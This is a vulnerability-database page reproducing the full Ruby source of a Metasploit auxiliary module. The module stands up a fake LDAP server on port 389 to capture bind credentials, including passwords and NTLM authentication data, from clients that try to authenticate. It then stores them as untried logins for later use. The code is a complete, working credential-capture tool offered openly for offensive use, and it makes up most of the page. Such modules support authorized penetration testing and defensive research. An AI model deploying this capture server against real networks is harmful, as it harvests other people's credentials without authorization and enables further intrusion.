Lucene search
K

Authentication Capture: LDAP

🗓️ 16 Feb 2024 19:51:07Reported by JustAnda7Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 224 Views

Capture LDAP authentication informatio

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::LDAP::Server

  def initialize(_info = {})
    super(
      'Name' => 'Authentication Capture: LDAP',
      'Description' => %q{
        This module mocks an LDAP service to capture authentication
        information of a client trying to authenticate against an LDAP service
      },
      'Author' => 'JustAnda7',
      'License' => MSF_LICENSE,
      'Actions' => [
        [ 'Capture', { 'Description' => 'Run an LDAP capture server' } ]
      ],
      'PassiveActions' => [ 'Capture' ],
      'DefaultAction' => 'Capture',
      'Notes' => {
        'Stability' => [],
        'Reliability' => [],
        'SideEffects' => []
      }
    )

    register_options(
      [
        OptAddress.new('SRVHOST', [ true, 'The ip address to listen on.', '0.0.0.0' ]),
        OptPort.new('SRVPORT', [ true, 'The port to listen on.', '389' ]),
        OptString.new('CHALLENGE', [ true, 'The 8 byte challenge', Rex::Text.rand_text_alphanumeric(16) ])
      ]
    )

    deregister_options('LDIF_FILE')

    register_advanced_options(
      [
        OptString.new('Domain', [ false, 'The default domain to use for NTLM authentication', 'DOMAIN']),
        OptString.new('Server', [ false, 'The default server to use for NTLM authentication', 'SERVER']),
        OptString.new('DnsName', [ false, 'The default DNS server name to use for NTLM authentication', 'SERVER']),
        OptString.new('DnsDomain', [ false, 'The default DNS domain name to use for NTLM authentication', 'example.com']),
        OptPath.new('LDIF_FILE', [ false, 'Directory LDIF file path'])
      ]
    )
  end

  def run
    unless datastore['CHALLENGE'].to_s =~ /^([a-zA-Z0-9]{16})$/
      print_error('CHALLENGE syntax must match 1122334455667788')
      return
    end
    exploit
  end

  def primer
    service.processed_pdu_handler(Net::LDAP::PDU::BindRequest) do |processed_data|
      if processed_data[:post_pdu]
        if processed_data[:error_msg]
          print_error(processed_data[:error_msg])
        else
          print_good(processed_data[:result_message])
          report_cred(processed_data)
        end
      end
    end
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:private],
      private_type: opts[:private_type]
    }.merge(service_data)

    if opts[:domain]
      credential_data = {
        realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
        realm_value: opts[:domain]
      }.merge(credential_data)
    end

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_data)

    create_credential_login(login_data)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Jun 2026 19:01Current
6.7Medium risk
Vulners AI Score6.7
224